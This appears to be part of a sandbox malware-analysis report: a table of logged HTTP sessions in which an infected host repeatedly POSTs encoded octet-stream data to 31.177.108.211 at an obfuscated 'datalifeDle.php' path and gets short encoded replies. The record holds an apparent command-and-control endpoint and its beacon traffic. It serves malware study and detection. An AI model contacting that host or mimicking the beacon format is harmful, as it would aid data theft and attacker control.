                                          Data Ascii: [SCSUJ\PY_QQR^TWZYZ]U^SDPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9E+/Y 9Y4%(+&R+5+(+<6]0'&:,&,<X2;9[&!^-
                                          Sep 13, 2024 21:04:19.414566994 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:19.549065113 CEST349INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:19 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 39 38 0d 0a 0d 1e 39 1f 3c 18 2b 51 30 05 0a 0b 2c 3d 32 19 24 2c 30 1e 3c 23 2e 1c 28 13 38 13 39 29 2e 5f 33 3b 35 5d 33 5a 37 12 24 3f 33 14 2b 3a 2e 46 0d 1d 25 58 3e 11 01 0d 2a 10 33 05 33 3d 2d 14 37 30 23 14 27 11 2f 1c 20 05 3e 5a 23 0c 09 53 25 14 08 01 2c 1b 04 5d 3d 0f 08 11 37 36 2e 55 0f 15 39 52 25 1f 04 55 28 31 24 00 29 11 2a 50 31 3f 0d 13 26 2b 28 1b 24 28 0f 0d 25 11 04 01 31 31 30 00 2b 13 29 57 21 0f 25 0a 22 3b 27 54 23 00 28 56 00 33 59 54 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 989<+Q0,=2$,0<#.(89)._3;5]3Z7$?3+:.F%X>*33=-70#'/ >Z#S%,]=76.U9R%U(1$)*P1?&+($(%110+)W!%";'T#(V3YT0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          112192.168.2.45678231.177.108.21180
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:04:18.742201090 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:19.098284960 CEST2532OUTData Raw: 5e 51 43 53 50 41 59 53 59 5f 51 51 52 5a 54 57 5a 52 5a 5e 55 52 53 41 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^QCSPAYSY_QQRZTWZRZ^URSAPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9@(:#2#*);*S=?^>$T+9'#4T&\$&?$19[&!^-/
                                          Sep 13, 2024 21:04:19.537015915 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:19.690294027 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:19 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          113192.168.2.45678331.177.108.21180
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:04:19.817940950 CEST554OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Sep 13, 2024 21:04:20.176260948 CEST2532OUTData Raw: 5b 5e 43 53 50 43 5c 57 59 5f 51 51 52 5c 54 51 5a 53 5a 51 55 55 53 48 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [^CSPC\WY_QQR\TQZSZQUUSHPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:??"#!>#5=:U?6*4Q)/"X%#1)$181;9[&!^-7
                                          Sep 13, 2024 21:04:20.561043978 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:20.691134930 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:20 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          114192.168.2.45678431.177.108.21180
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:04:20.819859982 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:21.176335096 CEST2532OUTData Raw: 5e 56 46 54 55 4b 59 53 59 5f 51 51 52 5d 54 5b 5a 58 5a 50 55 52 53 49 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^VFTUKYSY_QQR]T[ZXZPURSIPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:(/2 5 %X=(-<9Y+;$T+/*\0&*@%/<X1;9[&!^-3
                                          Sep 13, 2024 21:04:21.557112932 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:21.710366964 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:21 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          115192.168.2.45678531.177.108.21180
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:04:21.836574078 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:22.191900969 CEST2532OUTData Raw: 5b 53 43 57 55 44 5c 56 59 5f 51 51 52 5c 54 55 5a 5d 5a 5e 55 56 53 42 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [SCWUD\VY_QQR\TUZ]Z^UVSBPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9D<!4"] #:);(/:)<)<Y'U(P1*(&/ Z';9[&!^-7
                                          Sep 13, 2024 21:04:22.600115061 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:22.861603975 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:22 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0
                                          Sep 13, 2024 21:04:22.861623049 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:22 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          116192.168.2.45678631.177.108.21180
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:04:22.990046978 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:23.348078012 CEST2532OUTData Raw: 5e 53 46 56 55 46 5c 50 59 5f 51 51 52 5b 54 53 5a 5f 5a 51 55 56 53 42 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^SFVUF\PY_QQR[TSZ_ZQUVSBPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9(Y* !=#3Y)(%=/6)8#?Z6Z% <Q29+%7'+9[&!^-+
                                          Sep 13, 2024 21:04:23.750345945 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:23.885545015 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:23 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          117192.168.2.45678731.177.108.21180
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:04:24.004740953 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2528
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:24.363862991 CEST2528OUTData Raw: 5b 51 43 53 55 4b 5c 52 59 5f 51 51 52 59 54 5b 5a 5e 5a 5e 55 55 53 47 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [QCSUK\RY_QQRYT[Z^Z^UUSGPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9(/1#2#0=](+1+)*88V)?%$(Q&,2$^%;9[&!^-


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          118192.168.2.45678831.177.108.21180
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:04:24.557202101 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2108
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:24.910756111 CEST2108OUTData Raw: 5b 57 43 5f 55 47 59 5d 59 5f 51 51 52 5f 54 55 5a 5a 5a 58 55 5e 53 47 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [WC_UGY]Y_QQR_TUZZZXU^SGPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:<.[ !)##(+2?<:);+<'4U%\8%/?2+9[&!^-;
                                          Sep 13, 2024 21:04:25.321690083 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:25.468986988 CEST349INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:25 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 39 38 0d 0a 0d 1e 39 53 28 35 33 1e 27 5d 2f 19 2c 03 29 08 27 2f 3c 13 3f 0d 35 41 3f 03 3c 59 2d 14 31 06 30 3b 29 5b 24 05 37 5d 27 11 27 51 3d 3a 2e 46 0d 1d 25 5f 2a 2c 3f 0b 2a 2d 33 03 33 3e 29 59 20 0e 3c 05 24 01 23 52 21 2c 07 04 20 32 23 52 31 04 22 03 3b 1b 35 04 3e 0f 0c 58 34 26 2e 55 0f 15 39 56 26 0f 2a 1f 3c 31 27 5e 28 3f 22 54 25 11 2c 08 27 28 2b 0e 24 2b 21 0e 24 2f 26 03 26 0f 38 04 2b 13 04 0d 22 0f 2e 51 21 3b 27 54 23 00 28 56 00 33 59 54 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 989S(53']/,)'/<?5A?<Y-10;)[$7]''Q=:.F%_*,?*-33>)Y <$#R!, 2#R1";5>X4&.U9V&*<1'^(?"T%,'(+$+!$/&&8+".Q!;'T#(V3YT0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          119192.168.2.45678931.177.108.21180
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:04:24.679548979 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:25.035662889 CEST2532OUTData Raw: 5b 53 43 56 55 45 59 56 59 5f 51 51 52 50 54 50 5a 52 5a 5b 55 51 53 45 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [SCVUEYVY_QQRPTPZRZ[UQSEPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9A(246"3)>R=/[>?(?=0$&*;A2 %+9[&!^-
                                          Sep 13, 2024 21:04:25.425667048 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:25.589925051 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:25 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          120192.168.2.45679031.177.108.21180
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:04:25.708940029 CEST554OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Sep 13, 2024 21:04:26.069861889 CEST2532OUTData Raw: 5b 54 43 50 55 47 59 5d 59 5f 51 51 52 5f 54 53 5a 59 5a 5b 55 5f 53 41 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [TCPUGY]Y_QQR_TSZYZ[U_SAPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:(,1#!!Y =2S(9>;<+Z9%3(U&+E%+%;9[&!^-;
                                          Sep 13, 2024 21:04:26.473896980 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:26.605134010 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:26 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          121192.168.2.45679131.177.108.21180
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:04:26.728049040 CEST554OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Sep 13, 2024 21:04:27.082495928 CEST2532OUTData Raw: 5b 57 43 54 55 42 59 52 59 5f 51 51 52 5d 54 52 5a 5d 5a 5a 55 54 53 43 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [WCTUBYRY_QQR]TRZ]ZZUTSCPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9@(/*[#T:"3)(.T?/!Z)<P),.[% 3% $?%+9[&!^-3
                                          Sep 13, 2024 21:04:27.473531008 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:27.604829073 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:27 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          122192.168.2.45679231.177.108.21180
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:04:27.727890968 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:28.085587978 CEST2532OUTData Raw: 5e 56 46 56 50 43 59 54 59 5f 51 51 52 5c 54 54 5a 52 5a 5b 55 53 53 42 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^VFVPCYTY_QQR\TTZRZ[USSBPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:(*X7T*7 =X)+!+<%[=Q+>'4&)$$<'&9[&!^-7
                                          Sep 13, 2024 21:04:28.526871920 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:28.688282967 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:28 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          123192.168.2.45679331.177.108.21180
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:04:28.820270061 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:29.177376986 CEST2532OUTData Raw: 5b 57 46 55 55 47 59 52 59 5f 51 51 52 50 54 50 5a 5a 5a 5e 55 5e 53 45 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [WFUUGYRY_QQRPTPZZZ^U^SEPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:?/.\716 &>8&+Y%^*(933U1 &, [%9[&!^-
                                          Sep 13, 2024 21:04:29.577256918 CEST25INHTTP/1.1 100 Continue
